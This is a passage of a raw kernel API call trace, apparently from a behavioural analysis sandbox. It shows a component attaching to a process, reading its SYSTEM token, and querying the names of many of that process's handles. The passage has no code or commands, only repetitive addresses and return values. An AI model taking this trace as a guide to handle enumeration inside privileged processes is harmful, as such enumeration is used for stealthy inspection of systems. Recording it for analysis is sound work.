lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.886] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000698383c0, HandleInformation=0x0) returned 0x0 [0264.886] ObOpenObjectByPointer (in: Object=0xffffe000698383c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.886] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8823a [0264.886] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.886] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.886] IoCompleteRequest () returned 0x0 [0264.886] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.886] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.887] CloseHandle (hObject=0x1a8) returned 1 [0264.887] CloseHandle (hObject=0x180) returned 1 [0264.887] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.887] PsAcquireProcessExitSynchronization () returned 0x0 [0264.887] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.888] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006983bc00, HandleInformation=0x0) returned 0x0 [0264.888] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.888] PsReleaseProcessExitSynchronization () returned 0x2 [0264.888] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80238 [0264.888] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.888] ObfDereferenceObject (Object=0xffffe0006983bc00) returned 0x7ffd [0264.888] IoCompleteRequest () returned 0x0 [0264.888] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.888] PsAcquireProcessExitSynchronization () returned 0x0 [0264.888] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.888] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006983f090, HandleInformation=0x0) returned 0x0 [0264.888] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.888] PsReleaseProcessExitSynchronization () returned 0x2 [0264.888] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80237 [0264.888] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.888] ObfDereferenceObject (Object=0xffffe0006983f090) returned 0x7ffc [0264.888] IoCompleteRequest () returned 0x0 [0264.888] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.888] PsAcquireProcessExitSynchronization () returned 0x0 [0264.888] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.888] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069842090, HandleInformation=0x0) returned 0x0 [0264.888] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.888] PsReleaseProcessExitSynchronization () returned 0x2 [0264.888] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80236 [0264.888] ObQueryNameString (in: Object=0xffffe00069842090, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.888] ObfDereferenceObject (Object=0xffffe00069842090) returned 0x800f [0264.888] IoCompleteRequest () returned 0x0 [0264.888] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.888] PsAcquireProcessExitSynchronization () returned 0x0 [0264.888] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.888] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.888] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.888] PsReleaseProcessExitSynchronization () returned 0x2 [0264.888] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80235 [0264.888] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.888] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff8 [0264.888] IoCompleteRequest () returned 0x0 [0264.888] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.888] PsAcquireProcessExitSynchronization () returned 0x0 [0264.888] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.888] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.888] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.889] PsReleaseProcessExitSynchronization () returned 0x2 [0264.889] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80234 [0264.889] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.889] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff7 [0264.889] IoCompleteRequest () returned 0x0 [0264.889] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.889] PsAcquireProcessExitSynchronization () returned 0x0 [0264.889] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.889] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006c570370, HandleInformation=0x0) returned 0x0 [0264.889] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.889] PsReleaseProcessExitSynchronization () returned 0x2 [0264.889] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80233 [0264.889] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.889] ObfDereferenceObject (Object=0xffffe0006c570370) returned 0x7ff9 [0264.889] IoCompleteRequest () returned 0x0 [0264.889] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.889] PsAcquireProcessExitSynchronization () returned 0x0 [0264.889] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.889] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006986b5f0, HandleInformation=0x0) returned 0x0 [0264.889] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.889] PsReleaseProcessExitSynchronization () returned 0x2 [0264.889] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80232 [0264.889] ObQueryNameString (in: Object=0xffffe0006986b5f0, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.889] ObfDereferenceObject (Object=0xffffe0006986b5f0) returned 0x7fc4 [0264.889] IoCompleteRequest () returned 0x0 [0264.889] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.889] PsAcquireProcessExitSynchronization () returned 0x0 [0264.889] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.889] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698b9ae0, HandleInformation=0x0) returned 0x0 [0264.889] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.889] PsReleaseProcessExitSynchronization () returned 0x2 [0264.889] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80231 [0264.889] ObQueryNameString (in: Object=0xffffe000698b9ae0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.889] ObfDereferenceObject (Object=0xffffe000698b9ae0) returned 0x7ff7 [0264.889] IoCompleteRequest () returned 0x0 [0264.889] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.889] PsAcquireProcessExitSynchronization () returned 0x0 [0264.889] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.889] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698bf2a0, HandleInformation=0x0) returned 0x0 [0264.889] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.889] PsReleaseProcessExitSynchronization () returned 0x2 [0264.889] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80230 [0264.889] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.889] ObfDereferenceObject (Object=0xffffe000698bf2a0) returned 0x7ff8 [0264.890] IoCompleteRequest () returned 0x0 [0264.890] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.890] PsAcquireProcessExitSynchronization () returned 0x0 [0264.890] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.890] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698c0c40, HandleInformation=0x0) returned 0x0 [0264.890] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.890] PsReleaseProcessExitSynchronization () returned 0x2 [0264.890] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022f [0264.890] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.890] ObfDereferenceObject (Object=0xffffe000698c0c40) returned 0x8000 [0264.890] IoCompleteRequest () returned 0x0 [0264.890] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.890] PsAcquireProcessExitSynchronization () returned 0x0 [0264.890] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.890] ObReferenceObjectByHandle (in: Handle=0x40c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698c0db0, HandleInformation=0x0) returned 0x0 [0264.890] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.890] PsReleaseProcessExitSynchronization () returned 0x2 [0264.890] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022e [0264.890] ObQueryNameString (in: Object=0xffffe000698c0db0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.890] ObfDereferenceObject (Object=0xffffe000698c0db0) returned 0x7ffe [0264.890] IoCompleteRequest () returned 0x0 [0264.890] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.890] PsAcquireProcessExitSynchronization () returned 0x0 [0264.890] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.890] ObReferenceObjectByHandle (in: Handle=0x410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698c0ad0, HandleInformation=0x0) returned 0x0 [0264.890] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.890] PsReleaseProcessExitSynchronization () returned 0x2 [0264.890] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022d [0264.890] ObQueryNameString (in: Object=0xffffe000698c0ad0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.890] ObfDereferenceObject (Object=0xffffe000698c0ad0) returned 0x7ffe [0264.890] IoCompleteRequest () returned 0x0 [0264.890] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.890] PsAcquireProcessExitSynchronization () returned 0x0 [0264.890] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.890] ObReferenceObjectByHandle (in: Handle=0x414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698c0960, HandleInformation=0x0) returned 0x0 [0264.890] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.890] PsReleaseProcessExitSynchronization () returned 0x2 [0264.890] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022c [0264.890] ObQueryNameString (in: Object=0xffffe000698c0960, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.890] ObfDereferenceObject (Object=0xffffe000698c0960) returned 0x7ffe [0264.890] IoCompleteRequest () returned 0x0 [0264.891] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.891] PsAcquireProcessExitSynchronization () returned 0x0 [0264.891] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.891] ObReferenceObjectByHandle (in: Handle=0x4bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001486bb840, HandleInformation=0x0) returned 0x0 [0264.891] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.891] PsReleaseProcessExitSynchronization () returned 0x2 [0264.891] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022b [0264.891] ObQueryNameString (in: Object=0xffffc001486bb840, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.891] ObfDereferenceObject (Object=0xffffc001486bb840) returned 0x8000 [0264.891] IoCompleteRequest () returned 0x0 [0264.891] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.891] PsAcquireProcessExitSynchronization () returned 0x0 [0264.891] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.891] ObReferenceObjectByHandle (in: Handle=0x518, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696b2f20, HandleInformation=0x0) returned 0x0 [0264.891] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.891] PsReleaseProcessExitSynchronization () returned 0x2 [0264.891] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8022a [0264.891] ObQueryNameString (in: Object=0xffffe000696b2f20, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.891] ObfDereferenceObject (Object=0xffffe000696b2f20) returned 0x7ff3 [0264.891] IoCompleteRequest () returned 0x0 [0264.891] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.891] PsAcquireProcessExitSynchronization () returned 0x0 [0264.891] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.891] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693dd570, HandleInformation=0x0) returned 0x0 [0264.891] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.891] PsReleaseProcessExitSynchronization () returned 0x2 [0264.891] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80229 [0264.891] ObQueryNameString (in: Object=0xffffe000693dd570, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.891] ObfDereferenceObject (Object=0xffffe000693dd570) returned 0x7ff5 [0264.891] IoCompleteRequest () returned 0x0 [0264.891] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.891] PsAcquireProcessExitSynchronization () returned 0x0 [0264.891] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.891] ObReferenceObjectByHandle (in: Handle=0x524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698cac60, HandleInformation=0x0) returned 0x0 [0264.891] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.891] PsReleaseProcessExitSynchronization () returned 0x2 [0264.891] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80228 [0264.891] ObQueryNameString (in: Object=0xffffe000698cac60, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.891] ObfDereferenceObject (Object=0xffffe000698cac60) returned 0x7ffe [0264.891] IoCompleteRequest () returned 0x0 [0264.891] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.891] PsAcquireProcessExitSynchronization () returned 0x0 [0264.891] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.891] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698cef20, HandleInformation=0x0) returned 0x0 [0264.892] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.892] PsReleaseProcessExitSynchronization () returned 0x2 [0264.892] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80227 [0264.892] ObQueryNameString (in: Object=0xffffe000698cef20, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.892] ObfDereferenceObject (Object=0xffffe000698cef20) returned 0x7ffe [0264.892] IoCompleteRequest () returned 0x0 [0264.892] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.892] PsAcquireProcessExitSynchronization () returned 0x0 [0264.892] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.892] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d1450, HandleInformation=0x0) returned 0x0 [0264.892] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.892] PsReleaseProcessExitSynchronization () returned 0x2 [0264.892] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80226 [0264.892] ObQueryNameString (in: Object=0xffffe000698d1450, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.892] ObfDereferenceObject (Object=0xffffe000698d1450) returned 0x7ffe [0264.892] IoCompleteRequest () returned 0x0 [0264.892] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.892] PsAcquireProcessExitSynchronization () returned 0x0 [0264.892] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.892] ObReferenceObjectByHandle (in: Handle=0x594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148565d70, HandleInformation=0x0) returned 0x0 [0264.892] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.892] PsReleaseProcessExitSynchronization () returned 0x2 [0264.892] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80225 [0264.892] ObQueryNameString (in: Object=0xffffc00148565d70, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.892] ObfDereferenceObject (Object=0xffffc00148565d70) returned 0xfffff [0264.892] IoCompleteRequest () returned 0x0 [0264.892] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.892] PsAcquireProcessExitSynchronization () returned 0x0 [0264.892] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.892] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014854b140, HandleInformation=0x0) returned 0x0 [0264.892] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.892] PsReleaseProcessExitSynchronization () returned 0x2 [0264.892] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80224 [0264.892] ObQueryNameString (in: Object=0xffffc0014854b140, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.892] ObfDereferenceObject (Object=0xffffc0014854b140) returned 0x7fff [0264.892] IoCompleteRequest () returned 0x0 [0264.892] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.892] PsAcquireProcessExitSynchronization () returned 0x0 [0264.892] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.892] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698fb940, HandleInformation=0x0) returned 0x0 [0264.892] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.892] PsReleaseProcessExitSynchronization () returned 0x2 [0264.892] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80223 [0264.892] ObQueryNameString (in: Object=0xffffe000698fb940, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.893] ObfDereferenceObject (Object=0xffffe000698fb940) returned 0x800f 